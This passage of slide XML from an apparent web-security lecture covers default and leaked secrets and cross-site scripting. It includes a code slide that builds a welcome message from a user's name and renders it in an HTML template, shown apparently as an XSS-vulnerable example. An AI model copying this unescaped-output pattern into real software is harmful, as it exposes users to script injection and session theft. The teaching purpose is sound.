              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript’s capabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How can JavaScript be used for evil</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397" name="Google Shape;1397;p200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5166975" y="1419650"/>
            <a:ext cx="3611100" cy="25719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8" name="Google Shape;1398;p200"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="12889" r="8127"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4997040" y="1583740"/>
            <a:ext cx="3611050" cy="257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Issues</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="939" name="Google Shape;939;p138"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="867150" y="1778100"/>
            <a:ext cx="1831200" cy="2650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Many services and libraries use default secrets</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="940" name="Google Shape;940;p138"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2977475" y="1778100"/>
            <a:ext cx="2452800" cy="2650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Libraries often include hard coded secrets that you’re expected to change</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941" name="Google Shape;941;p138"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5789850" y="1778100"/>
            <a:ext cx="2487000" cy="2650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One common source of breaches is storing secrets in source control, like Git</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="160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201"/>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Cross-Site Scripting (XSS)?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1404" name="Google Shape;1404;p201"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1149800"/>
            <a:ext cx="8285400" cy="3505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dirty="0"/>
              <a:t>Enables attackers to inject client-side scripts into other user’s web pages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most commonly seen in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ActionScript, VBScript, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Allows an attacker to execute arbitrary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> in the user’s browser</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Access to sensitive page content</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Modify or add page content</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>Steal session cookies, which allows impe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>rsonation of users</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0"/>
            </a:br>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>An extremely prominent problem across the web for decades</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>One of the most common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>HackerOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> vulnerability types reported from 2013-Present</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202"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="3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1410" name="Google Shape;1410;p202"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" marR="114300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="132352"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" marR="114300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="132352"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>= yield</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>get_user(username)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>welcome_message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>"Hi " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> ", thanks for logging in!"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>render(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>"welcome.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> welcome_message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>welcome_message</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" marR="114300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="132352"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" marR="114300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="132352"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" marR="114300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="132352"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;h1&gt;{{ welcome_message }}&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" marR="114300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="132352"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" marR="114300" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="132352"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
